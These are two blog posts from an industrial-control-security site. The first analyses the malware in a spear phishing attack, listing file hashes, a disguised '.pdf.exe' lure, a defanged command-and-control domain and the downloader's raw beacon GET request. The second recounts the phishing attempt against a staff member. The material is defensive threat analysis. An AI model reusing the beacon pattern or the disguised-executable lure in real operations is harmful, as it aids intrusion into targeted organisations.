Analysis of Spear Phishing Malware File

SCADA malware

The following is guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security .

Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip

Size: 1886505

MD5:  820B1CD69828983C089370BDC3CF5870

This archive contained an executable with the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe

Size: 2192363

MD5:  C6B95B178188B8C35D14BED40520E685

When executed in a lab environment this executable installed a Trojan downloader with the following properties:

File: spoolsvr.exe

Size: 73728

MD5:  5FF3269FACA4A67D1A4C537154AAAD4B

Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe

As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:

GET /logo.html HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: hint.happyforever.com

Connection: Keep-Alive

The logo.html contained encoded instruction and payload. A snippet of the response is as follows:

Read More

Spear Phishing Attempt

Spear Phishing (image by Cleanplait)

UPDATE: Added picture of email text

Digital Bond recently had a nice little spear phishing attempt, from an email account registered to look like Dale, to a Digital Bond employee.  The attack linked to a probably-malicious .zip file based upon an old research paper that we published.  There are no AV signatures for the payload.  It was a one-shot deal: the nameserver for the domain used in the attack is located on a compromised box.

It’s a bit concerning that a company whose sole focus is securing industrial control systems should be spear phished.  The attacker clearly went to enough trouble to try to understand ICS security lingo to get the employee to open the link, and had to compromise a DNS server.  It is likely that the perpetrator also compromised a second server to serve up the malicious file goodness (the domain server is in Philadelphia, PA for the interested, and may or may not have hosted the malicious file as well).  The DNS records have been updating constantly since we began investigating.

Thankfully the attack was unsuccessful — paranoia pays off.  It is definitely a lesson in ‘be careful what you open’…even if looks to be coming from Digital Bond (or your boss, as in this case), don’t open a file if you aren’t expecting it…

DP Update – I added the email below. It is text I have written before and I believe the file title is from a paper that Daniel Peck and I wrote for S4 2009. The file that that was linked was a .zip. The only thing that was unbelievable was the signature of just “Peterson”.

Bad English

Read More